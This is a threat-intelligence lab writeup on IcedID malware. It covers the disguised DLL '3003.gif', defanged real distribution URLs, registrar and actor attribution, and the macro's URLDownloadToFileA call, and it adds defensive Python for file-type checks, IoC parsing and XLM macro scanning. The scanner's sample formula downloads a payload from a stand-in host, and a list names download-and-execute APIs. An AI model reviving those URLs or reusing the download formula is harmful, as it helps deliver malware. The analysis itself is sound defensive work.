IcedID — Threat Intel Lab Writeup

Hacktivities
4 min read, Feb 26, 2025


Overview

This writeup documents my approach to the lab IcedID available on the CyberDefenders website, a blue team-focused cyber threat intelligence lab that requires you to examine a potential attack.

Disclaimer

I like to add a brief disclaimer before a writeup to encourage people to attempt the lab before reading this article, since there will obviously be spoilers in this writeup. I believe you will enjoy the lab more if you attempt it yourself first and then come back to this writeup if you get stuck or need a hint. So without any further delay, let's get started!

Scenario

A cyber threat group was identified for initiating widespread phishing campaigns to distribute further malicious payloads. The most frequently encountered payloads were IcedID. You have been given a hash of an IcedID sample to analyze and monitor the activities of this advanced persistent threat (APT) group.

Lab Analysis

What is the name of the file associated with the given hash?

Searching VirusTotal for the provided hash shows that it belongs to a malicious XLSX file. The popular threat label for this file is trojan.x97m/icedid. According to MITRE, IcedID is a modular banking malware designed to steal financial information that has been observed in the wild since at least 2017. IcedID has been downloaded by Emotet in multiple campaigns. In VirusTotal, we can see the associated file names for this hash.

Associated File Names.

Can you identify the filename of the GIF file that was deployed?

In VirusTotal, we can see multiple files are dropped by the malware, including a GIF file seen below.

3003.gif

Pivoting on this file in VirusTotal, we can observe that the file is actually a Windows DLL. A threat report from TrendMicro mentions that the threat actors use XLSM files containing malicious macro code to download a 64-bit .dll file, which is the IcedID binary itself. The article provides the sample URLs seen below, where the IcedID DLL is disguised as a GIF file.

hxxps://agenbolatermurah[.]com/ds/3003[.]gif
hxxps://columbia[.]aula-web[.]net/ds/3003[.]gif
hxxps://metaflip[.]io/ds/3003[.]gif
hxxps://partsapp[.]com[.]br/ds/3003[.]gif
hxxps://tajushariya[.]com/ds/3003[.]gif
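The report's point is that the "GIF" served from those URLs is really a PE file, so a defender's first check is the file's magic bytes rather than its extension. The following is an added example, not code from the lab, the writeup, or the TrendMicro report: it classifies a byte string as GIF, PE executable, or PE DLL by reading the MZ header, the e_lfanew pointer, and the IMAGE_FILE_DLL bit in the COFF file header, and flags a mismatch between the claimed extension and the real type. The sample inputs are constructed in the block (a real GIF header and a hand-built minimal PE header), so nothing from the campaign is needed to run it.

```python
import struct

IMAGE_FILE_EXECUTABLE_IMAGE = 0x0002
IMAGE_FILE_DLL = 0x2000

# Constructed sample: a valid GIF89a header followed by filler (not a real image file).
GIF_SAMPLE = b"GIF89a" + b"\x01\x00\x01\x00\x80\x00\x00" + b"\x00" * 32


def build_fake_pe(is_dll: bool) -> bytes:
    """Construct the smallest byte string that satisfies classify_payload.

    Layout: 64-byte DOS header starting with 'MZ', e_lfanew at 0x3C pointing to
    0x40, then the 'PE\\0\\0' signature and an IMAGE_FILE_HEADER whose
    Characteristics field optionally carries IMAGE_FILE_DLL. This is a
    constructed header for testing, not a loadable executable.
    """
    characteristics = IMAGE_FILE_EXECUTABLE_IMAGE | (IMAGE_FILE_DLL if is_dll else 0)
    dos = bytearray(b"MZ" + b"\x00" * 0x3E)
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew -> offset of PE signature
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    file_header = struct.pack("<HHIIIHH", 0x8664, 1, 0, 0, 0, 0, characteristics)
    return bytes(dos) + b"PE\x00\x00" + file_header


def classify_payload(data: bytes) -> str:
    """Return 'gif', 'pe-dll', 'pe-exe', 'mz-no-pe' or 'unknown' from magic bytes."""
    if data.startswith((b"GIF87a", b"GIF89a")):
        return "gif"
    if len(data) >= 0x40 and data.startswith(b"MZ"):
        e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
        # Characteristics sits 18 bytes into IMAGE_FILE_HEADER, which follows the 4-byte signature.
        if data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00" and len(data) >= e_lfanew + 24:
            characteristics = struct.unpack_from("<H", data, e_lfanew + 22)[0]
            return "pe-dll" if characteristics & IMAGE_FILE_DLL else "pe-exe"
        return "mz-no-pe"
    return "unknown"


def extension_mismatch(filename: str, data: bytes) -> bool:
    """True when the extension claims a type the magic bytes contradict."""
    ext = filename.rsplit(".", 1)[-1].lower()
    expected = {"gif": "gif", "dll": "pe-dll", "exe": "pe-exe"}.get(ext)
    return expected is not None and expected != classify_payload(data)


if __name__ == "__main__":
    for name, blob in [("3003.gif", build_fake_pe(True)), ("real.gif", GIF_SAMPLE)]:
        print(name, classify_payload(blob), "MISMATCH" if extension_mismatch(name, blob) else "ok")
```

Run over files carved from a proxy cache or sandbox, the mismatch flag is a cheap triage signal: a download named `.gif` that classifies as `pe-dll` is exactly the masquerade described in the report.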

How many domains does the malware look to download the additional payload file in Q2?

In VirusTotal, we can see the malware contacts some of the domains observed above to download the additional payload file titled “3003.gif” in Q2.
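Counting distribution domains from a list of defanged IoCs is a routine CTI step, and it is easy to over-count when the same domain appears twice or under different paths. The following is an added example, not part of the writeup or the lab: it refangs the `hxxps://` and `[.]` notation from the report's URL list quoted above, parses each URL with the standard library, and returns the set of unique hosts and payload filenames, defanging again for output. The URL list is embedded as given in the writeup; the count it produces is for that sample list only and is not the lab's VirusTotal-based answer.

```python
import re
from urllib.parse import urlsplit

# The defanged sample URLs from the TrendMicro report as quoted in this writeup.
DEFANGED_URLS = [
    "hxxps://agenbolatermurah[.]com/ds/3003[.]gif",
    "hxxps://agenbolatermurah[.]com/ds/3003[.]gif",
    "hxxps://columbia[.]aula-web[.]net/ds/3003[.]gif",
    "hxxps://metaflip[.]io/ds/3003[.]gif",
    "hxxps://partsapp[.]com[.]br/ds/3003[.]gif",
    "hxxps://tajushariya[.]com/ds/3003[.]gif",
]


def refang(url: str) -> str:
    """Turn hxxp(s)://host[.]tld into a parseable URL (in memory only)."""
    url = re.sub(r"^hxxp(s?)://", r"http\1://", url, flags=re.IGNORECASE)
    return url.replace("[.]", ".").replace("[:]", ":")


def defang(url: str) -> str:
    """Inverse of refang, so results can be written back to a report safely."""
    url = re.sub(r"^http(s?)://", r"hxxp\1://", url, flags=re.IGNORECASE)
    return url.replace(".", "[.]")


def unique_hosts(defanged_urls: list[str]) -> list[str]:
    """Sorted list of distinct hostnames, lower-cased to avoid case duplicates."""
    hosts = {urlsplit(refang(u)).hostname.lower() for u in defanged_urls}
    return sorted(hosts)


def payload_filenames(defanged_urls: list[str]) -> set[str]:
    """Distinct final path components, e.g. the '3003.gif' payload name."""
    return {urlsplit(refang(u)).path.rsplit("/", 1)[-1] for u in defanged_urls}


if __name__ == "__main__":
    hosts = unique_hosts(DEFANGED_URLS)
    print(f"{len(hosts)} unique hosts:")
    for h in hosts:
        print("  ", defang(h))
    print("payload names:", payload_filenames(DEFANGED_URLS))
```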

Malware Contacted URLs.

From the domains mentioned in Q3, a DNS registrar was predominantly used by the threat actor to host their harmful content, enabling the malware’s functionality. Can you specify the Registrar INC?

In VirusTotal, we can see under the relations tab that some of the domains which hosted the additional payload have the DNS registrar “NAMECHEAP INC”.

DNS Registrar.

Threat actors can use Namecheap to register their domains due to low-cost domain registration, ease of registration, lenient abuse policies and fast domain propagation, to name but a few reasons.

Could you specify the threat actor linked to the sample provided?

MITRE provides a list of groups that use this software. One such group is G0127 (i.e. GOLD CABIN or Shathak). A case study published by BitDefender states that this is a financially motivated threat group operating since 2018. They usually distribute malware using malicious documents in password-protected archives and employ a domain generation algorithm to thwart law enforcement agencies' attempts to block registered domains.

TA551’s URLs usually host a PHP script that delivers the malware as a DLL. Prior to April 2020, the most common malware associated with Shathak was Ursnif. After that, they started infecting victims with Valak. By taking into account that both Ursnif and Valak are considered to have ties with the Russian-speaking community, we can infer that Shathak is likely made up of Russian cybercriminals. Since the end of July 2020, their favorite tool in the arsenal became IcedID.

In the Execution phase, what function does the malware employ to fetch extra payloads onto the system?

In an article posted by Fortinet, we can see that the Excel file contains obfuscated Excel 4.0 macro formulas to download and execute either payload. The macro generates a payload URL and calls the WinAPI function “URLDownloadToFileA” to download the malware.
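Because the Excel 4.0 formulas are obfuscated, a detection that only greps the sheet for the literal string "URLDownloadToFileA" misses the common trick of assembling the API name from `CHAR()` calls and string fragments in one cell and referencing that cell from a `CALL()` in another. The following is an added example, not from the writeup, the lab, or the Fortinet article: it takes XLM formulas already extracted from a workbook (as a tool such as olevba would list them; the extraction step is assumed, not shown), reconstructs the literal text each formula builds, follows R1C1-style cell references, and flags cells that invoke `CALL`/`EXEC`/`REGISTER` or resolve to a download-and-execute API. The three sample formulas are constructed for the example and use a reserved `.invalid` domain.

```python
import re

# APIs worth flagging when they surface in reconstructed formula text.
SUSPICIOUS_APIS = {
    "URLDownloadToFileA", "URLDownloadToFileW", "ShellExecuteA", "WinExec", "CreateProcessA",
}

# Constructed sample cells (cell reference -> XLM formula), not from a real workbook.
SAMPLE_CELLS = {
    "R1C1": '=CHAR(85)&CHAR(82)&CHAR(76)&"Download"&"ToFileA"',
    "R2C1": '=CALL("urlmon",R1C1,"JJCCBB",0,"hxxps://example[.]invalid/ds/3003[.]gif","3003.gif",0,0)',
    "R3C1": "=SUM(A1:A3)",
}

# CHAR(n) calls and double-quoted string literals, in the order they appear.
TOKEN_RE = re.compile(r'CHAR\((\d+)\)|"((?:[^"]|"")*)"', re.IGNORECASE)
# Excel 4.0 macro functions that load DLLs or run commands.
XLM_FUNC_RE = re.compile(r"\b(CALL|EXEC|REGISTER|FORMULA|RUN)\s*\(", re.IGNORECASE)
# R1C1-style references to other cells.
REF_RE = re.compile(r"\bR(\d+)C(\d+)\b")


def reveal_literals(formula: str) -> str:
    """Concatenate every CHAR(n) and string literal in a formula, left to right."""
    parts = []
    for m in TOKEN_RE.finditer(formula):
        if m.group(1) is not None:
            parts.append(chr(int(m.group(1))))
        else:
            parts.append(m.group(2).replace('""', '"'))  # un-escape doubled quotes
    return "".join(parts)


def scan_cells(cells: dict[str, str]) -> dict[str, set[str]]:
    """Map each suspicious cell to the indicators found in it."""
    revealed = {ref: reveal_literals(f) for ref, f in cells.items()}
    findings: dict[str, set[str]] = {}
    for ref, formula in cells.items():
        indicators = {m.group(1).upper() for m in XLM_FUNC_RE.finditer(formula)}
        # Text the cell builds itself plus text pulled in from referenced cells.
        text = revealed[ref]
        for m in REF_RE.finditer(formula):
            text += revealed.get(f"R{m.group(1)}C{m.group(2)}", "")
        lowered = text.lower()
        indicators.update(api for api in SUSPICIOUS_APIS if api.lower() in lowered)
        if indicators:
            findings[ref] = indicators
    return findings


if __name__ == "__main__":
    for ref, hits in sorted(scan_cells(SAMPLE_CELLS).items()):
        print(ref, "->", ", ".join(sorted(hits)))
```

The `SUM` cell produces no finding, the `CHAR()` cell is flagged once its fragments spell the API name, and the `CALL` cell is flagged both for the macro function and for the API it reaches through the R1C1 reference; extending `SUSPICIOUS_APIS` and `XLM_FUNC_RE` is how you would tune this for other campaigns.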

Conclusion

I really enjoyed working through this lab and learning more about the IcedID malware. Thank you for reading till the end and I hope you enjoyed this writeup!
